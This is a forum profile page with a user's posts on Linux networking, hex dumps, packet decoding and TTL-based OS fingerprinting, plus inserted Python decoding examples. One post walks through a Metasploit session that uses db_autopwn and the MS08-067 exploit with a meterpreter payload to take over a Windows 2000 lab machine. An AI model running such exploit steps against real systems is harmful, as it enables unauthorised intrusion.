rocky

Members
  • Content count

    19
Community Reputation

1 Neutral

About rocky

  • Rank
    I broke 10 posts and all I got was this lousy title!
  • Birthday 09/25/1981

Profile Information

  • Location
    California
  1. Try the following command:

     iwconfig [interface] mode monitor

     This command will put your wireless interface into RFMON mode. Please read: http://wiki.wireshark.org/CaptureSetup/WLAN
  2. I recommend using VMWare Server - which is free to download and install - for running Linux. This way, during the course of your learning, any mistakes you may make will only affect the virtual machine. You may find that in the future you will want to use Linux as your main operating system, but in the meantime, if your goal is to simply learn Linux while still retaining the functionality of Windows, give the virtualization method a shot. VMWare is fairly straightforward to install and to use as well. An added bonus will be learning two new skills -- always a plus! http://www.vmware.com/
  3. For finding vulnerabilities I would check out Nessus or SAINT. What's cool about using Nessus is that you can load an exported Nessus scan right into Metasploit, making the process much more automated.

     autopwn using an exported NBE Nessus scan file against a Windows 2000 Server pansy box:

     msf > db_create
     [*] Creating a new database instance...
     [*] Successfully connected to the database
     [*] File: /root/.msf3/sqlite3.db
     msf > db_import_nessus_nbe /root/nessus1026.nbe
     msf > db_services
     [*] Time: 2009-11-26 15:33:20 -0800 Service: host=192.168.1.107 port=139 proto=tcp state=up name=netbios-ssn
     [snip]
     [*] Time: 2009-11-26 15:33:23 -0800 Service: host=192.168.1.107 port=135 proto=udp state=up name=epmap
     msf > db_vulns
     [*] Time: 2009-11-26 15:33:20 -0800 Vuln: host=192.168.1.107 port=139 proto=tcp name=NSS-11011 refs=
     [snip]
     [*] Time: 2009-11-26 15:33:25 -0800 Vuln: host=192.168.1.107 port=445 proto=tcp name=NSS-11110 refs=CVE-2002-0724,BID-5556,OSVDB-2074
     msf > db_autopwn -p -t -e

     A more manual exploit against a Windows 2000 Server pansy box:

     msf > use exploit/windows/smb/ms08_067_netapi
     msf exploit(ms08_067_netapi) > set RHOST 192.168.1.107
     RHOST => 192.168.1.107
     msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
     PAYLOAD => windows/meterpreter/bind_tcp
     msf exploit(ms08_067_netapi) > set LHOST 192.168.1.112
     LHOST => 192.168.1.112
     msf exploit(ms08_067_netapi) > exploit
     [*] Started bind handler
     [*] Automatically detecting the target...
     [*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English
     [*] Selected Target: Windows 2000 Universal
     [*] Triggering the vulnerability...
     [*] Sending stage (719360 bytes)
     [*] Meterpreter session 1 opened (192.168.1.112:46190 -> 192.168.1.107:4444)
     meterpreter >
  4. I believe that this Slackware networking tutorial will answer your question about wpa_supplicant and WPA2: http://alien.slackbook.org/dokuwiki/doku.php?id=slackware:network
  5. In fact lspci -k will show the kernel modules.
  6. You need the -v switch for lspci to show you which module is in use:

     lspci -v

     If you use the verbose switch you get more detailed information about each PCI device, but the same devices are displayed regardless of whether the switch is present.
  7. lspci might be the command you're looking for.
  8. Dial Tone, cool man, I can respect that. Try this: First you have to format the hex data you have to the format that text2pcap wants:

     000000 00 0f db cb 06 6a 00 03 93 ed 1d 83 08 00 45 18
     000010 00 47 30 7d 00 00 ff 11 07 5e c0 a8 01 61 c0 a8
     000020 01 01 14 e9 00 35 00 33 96 ce 4c 24 01 00 00 01
     000030 00 00 00 00 00 00 02 39 37 01 31 03 31 36 38 03
     000040 31 39 32 07 69 6e 2d 61 64 64 72 04 61 72 70 61
     000050 00 00 0c 00 01

     Next, use text2pcap on the file you have saved this data into. Try that; it totally worked for me, I was able to open the file in wireshark and everything.
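The reshaping step in the post above, as an added example (not rocky's or Dial Tone's code, and not part of the original thread): a small Python script that takes a flat run of hex bytes and lays it out in the "offset bytes" form that text2pcap reads (16 bytes per line, six-hex-digit offset). The input string is the same 85 bytes quoted in the post, embedded here as a constructed sample.

```python
# Added example: reshape a flat hex byte run into text2pcap's input layout.
# Once written to a file, the result can be converted with
#   text2pcap dump.txt dump.pcap
# and opened in Wireshark.
from __future__ import annotations

# Constructed input: the 85 bytes quoted in the thread, as one flat string
# (any mix of spaces/newlines between the byte pairs is tolerated).
RAW_HEX = (
    "00 0f db cb 06 6a 00 03 93 ed 1d 83 08 00 45 18 00 47 30 7d 00 00 ff 11 "
    "07 5e c0 a8 01 61 c0 a8 01 01 14 e9 00 35 00 33 96 ce 4c 24 01 00 00 01 "
    "00 00 00 00 00 00 02 39 37 01 31 03 31 36 38 03 31 39 32 07 69 6e 2d 61 "
    "64 64 72 04 61 72 70 61 00 00 0c 00 01"
)


def hex_run_to_bytes(hex_run: str) -> bytes:
    """Strip all whitespace and decode the remaining hex digits."""
    return bytes.fromhex("".join(hex_run.split()))


def to_text2pcap(hex_run: str, width: int = 16) -> str:
    """Return text2pcap-style lines: a 6-digit hex offset followed by
    up to `width` space-separated byte values, one line per `width` bytes."""
    data = hex_run_to_bytes(hex_run)
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        lines.append(f"{off:06x} " + " ".join(f"{b:02x}" for b in chunk))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Writing the output to a file is left to the shell: python3 this.py > dump.txt
    print(to_text2pcap(RAW_HEX), end="")
```

Running it reproduces the six offset lines from the post (000000 through 000050); a trailing short line is fine, text2pcap only needs the offsets to be consistent.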
  9. Hi Dirk Chesnut. Not really knowing much about rkhunter, I actually went and downloaded rkhunter and ran it, and it must do some sort of generic profiling which is then compared to the current state of your system, because I got some errors, mostly innocuous ones though. After that it must store information about the last known state, being the last time it was run, in the /var/lib/rkhunter directory in a file called db, which I'm assuming is for database. Now I'm parroting you, however that is what I meant by database in my previous post: a file that contains the profile of your local machine in its last known state, which is then compared against the current state when you run rkhunter, which is bound to produce false positives. Good post by the way.
  10. I think his professor is trying to get him to take an IP packet, analyze the data, then deduce what operating system it came from. It's already in hex and only the data portion would produce useful information from an ascii conversion.

      00 1a 70 fb f7 77 00 13 02 a9 97 97 08 00 45 00 00 45 c7 98 00 00 80 11 25 f9 c0 a8 01 65 4a dc 40 2d d6 08 00 35 00 31 d0 9e 1c 86 01 00 00 01 00 00 00 00 00 00 03 77 77 77 0f 74 68 65 66 65 64 6f 72 61 6c 6f 75 6e 67 65 03 63 6f 6d 00 00 01 00 01

      Above is a DNS request from a Windows XP laptop I have to the DNS server of my ISP that I took directly from Wireshark. The TTL is 0x80 or 128, which is a clear indicator that it's a Windows machine. I think in the above case, the hex data that Dial Tone posted, it was just a matter of fingerprinting by determining the TTL.
  11. I've never used rkhunter but it appears to use a database and then does a comparison of the database against the current state of your system. I wouldn't be too worried about the inode number change. You said that you updated your system? That is most likely the culprit.
  12. Here's what I found from analyzing the information:

      000fdbcb066a000393ed1d830800[IP packet]4518 0047307d0000ff[TTL]11[udp]075ec0a80161[source address]c0a80101[destination address]14e9[source port]0035[destination port]003396ce4c240100000100000000000002393701310331363803313932 07696e2d6164647204617270610000[data]0c0001

      List of TTL by operating system: http://members.cox.net/~ndav1/self_published/TTL_values.html
  13. Now I'm probably wrong but here's what I got:

      IP packet
      Unix like operating system
      UDP
      source address 192.168.1.197
      destination address 192.168.1.1
      source port 5353
      destination port 53/DNS

      Here's what the data portion says: ?97?1?168?192?in-addr?arpa??
  14. The opposite: I have text data I want to be hex. Think of it as if in programming, you stored "12345" as a string instead of an integer. Cool, so if you have a text file use xxd as a previous poster noted (sorry for being overzealous). But because I'm kind of thick skulled, is this what you're aiming for?

      $ cat file.txt
      This is example text.
      $ xxd file.txt file.out
      $ cat file.out
      0000000: 5468 6973 2069 7320 6578 616d 706c 6520  This is example
      0000010: 7465 7874 2e0a                           text..
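The field-by-field decode that posts 10, 12 and 13 above do by hand, as an added example (not rocky's or Dial Tone's code, and not part of the original thread): a Python decoder that walks Ethernet, IPv4, UDP and the DNS question section of a raw frame, verifies the IPv4 header checksum as a sanity check on hand-typed dumps, and applies the TTL rule of thumb the thread uses (initial TTL 64 for Linux, 128 for Windows, 255 for other Unix-likes). Both frames quoted in the thread are embedded as constructed sample input; the default-TTL table and the assumption that the sending host is on the local segment (so the TTL is still at its initial value) are mine, not the thread's.

```python
# Added example: decode Ethernet/IPv4/UDP/DNS from a raw hex frame and apply
# the TTL-based OS rule of thumb discussed in the thread.
from __future__ import annotations

import struct
from dataclasses import dataclass

# Constructed inputs: the two frames quoted in the thread as flat hex strings
# (Dial Tone's reverse lookup, then the Windows XP lookup from post 10).
DIAL_TONE_FRAME = (
    "000fdbcb066a000393ed1d830800"                # Ethernet header
    "45180047307d0000ff11075ec0a80161c0a80101"    # IPv4 header
    "14e90035003396ce"                            # UDP header
    "4c2401000001000000000000"                    # DNS header
    "02393701310331363803313932"                  # labels 97.1.168.192
    "07696e2d61646472046172706100"                # labels in-addr.arpa, root
    "000c0001"                                    # QTYPE PTR, QCLASS IN
)
WINDOWS_XP_FRAME = (
    "001a70fbf777001302a997970800"
    "45000045c7980000801125f9c0a801654adc402d"
    "d60800350031d09e"
    "1c8601000001000000000000"
    "037777770f7468656665646f72616c6f756e676503636f6d00"
    "00010001"
)

# Assumed default initial TTLs (general knowledge, not from the thread's table).
DEFAULT_TTLS = ((64, "Linux"), (128, "Windows"), (255, "Unix-like"))
PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}
QTYPE_NAMES = {1: "A", 12: "PTR", 28: "AAAA"}


@dataclass
class Summary:
    ttl: int
    protocol: str
    src: str
    dst: str
    sport: int
    dport: int
    qname: str
    qtype: str
    ip_checksum_ok: bool
    os_guess: str


def ipv4_checksum_ok(header: bytes) -> bool:
    """One's-complement sum over the whole header (checksum field included)
    must fold to 0xFFFF if the header was transcribed correctly."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF


def guess_os_from_ttl(ttl: int) -> str:
    """Pick the smallest common default TTL that is >= the observed TTL.
    Assumes the sender is on the LAN, so no router has decremented it."""
    for initial, label in DEFAULT_TTLS:
        if ttl <= initial:
            return f"{label} (default TTL {initial}, {initial - ttl} hop(s) away)"
    return "unknown"


def parse_dns_name(payload: bytes, off: int) -> tuple[str, int]:
    """Read a sequence of length-prefixed labels ending in a zero byte."""
    labels = []
    while True:
        length = payload[off]
        off += 1
        if length == 0:
            return ".".join(labels), off
        if length & 0xC0:  # compression pointers never appear in a question name
            raise ValueError("unexpected compression pointer in question")
        labels.append(payload[off:off + length].decode("ascii"))
        off += length


def parse_frame(hex_run: str) -> Summary:
    frame = bytes.fromhex("".join(hex_run.split()))
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    ttl, proto = ip[8], ip[9]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    if proto != 17:
        raise ValueError(f"only UDP is decoded here, got {PROTO_NAMES.get(proto, proto)}")
    udp = ip[ihl:total_len]
    sport, dport, ulen = struct.unpack("!HHH", udp[:6])
    dns = udp[8:ulen]
    qname, off = parse_dns_name(dns, 12)            # skip the 12-byte DNS header
    qtype = struct.unpack("!H", dns[off:off + 2])[0]
    return Summary(ttl, PROTO_NAMES[proto], src, dst, sport, dport, qname,
                   QTYPE_NAMES.get(qtype, str(qtype)), ipv4_checksum_ok(ip[:ihl]),
                   guess_os_from_ttl(ttl))


if __name__ == "__main__":
    for name, frame in (("Dial Tone", DIAL_TONE_FRAME), ("Windows XP", WINDOWS_XP_FRAME)):
        print(name, parse_frame(frame))
```

The Windows XP frame passes the header checksum check; the frame from the hex post does not, which suggests a byte was mis-typed somewhere in that thread, though the TTL, addresses and ports still decode as post 13 worked them out. The TTL guess is only a heuristic: a host behind routers, a tuned sysctl, or a VM's network stack can all make the number lie.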
  15. Are you trying to save data from wireshark? If so, use the export function, and if you're just looking to save a frame or less, use Selected Packet Bytes in File > Export > Selected Packet Bytes. After you have this saved it will be a binary file, so as a previous poster suggested, use xxd to get a hex dump to standard out, or use redirection to save the output of the xxd hex dump into a text file. I think this is what you're asking; if not, my apologies. EDIT: Also there is usually a hexdump command, using no flags, on most Linux installs that will give you just hex, no ascii, which I think is pretty much the same output as od -x <filename>.